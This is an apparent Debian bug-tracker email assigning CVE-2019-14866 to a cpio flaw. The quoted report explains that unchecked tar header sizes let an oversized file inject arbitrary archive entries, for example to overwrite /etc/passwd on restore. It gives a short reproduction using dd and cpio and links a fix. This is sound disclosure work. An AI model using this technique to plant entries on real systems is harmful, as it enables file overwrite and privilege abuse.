Control: retitle -1 cpio: CVE-2019-14866: improper input validation when writing tar header fields leads to unexpect tar generation
Hi, On Mon, Sep 30, 2019 at 10:58:37AM +0100, Thomas Habets wrote: > Package: cpio > > This command looks safe, and is a reasonable "backup" command: > find /home -type f | cpio -H tar -o > /var/backups/backup.tar > > But if /home/evil/foo.data is maliciously set up (size is >8GiB) then the > tar file can be made to have arbitrary content, so a restore could > overwrite /etc/passwd or anything else under the restore tree, using any > permissions. A world writable /dev/sda would also be bad, as would many > other fun variants. Like user controlling /home/evil can inject > /home/friendly/.bashrc content too. > > Patch at https://cement.retrofitta.se/tmp/cpio-tar.patch > > Patch commit message: > > Check for size overflow in tar header fields. > > This prevents surprising outputs being created, e.g. this cpio tar > output with more than one file: > > tar cf suffix.tar AUTHORS > dd if=/dev/zero seek=16G bs=1 count=0 of=suffix.tar > echo suffix.tar | cpio -H tar -o | tar tvf - > > -rw-r--r-- 1000/1000 0 2019-08-30 16:40 suffix.tar > -rw-r--r-- thomas/thomas 161 2019-08-30 16:40 AUTHORS In meanwhile CVE-2019-14866 was assigned for this issue. Regards, Salvatore
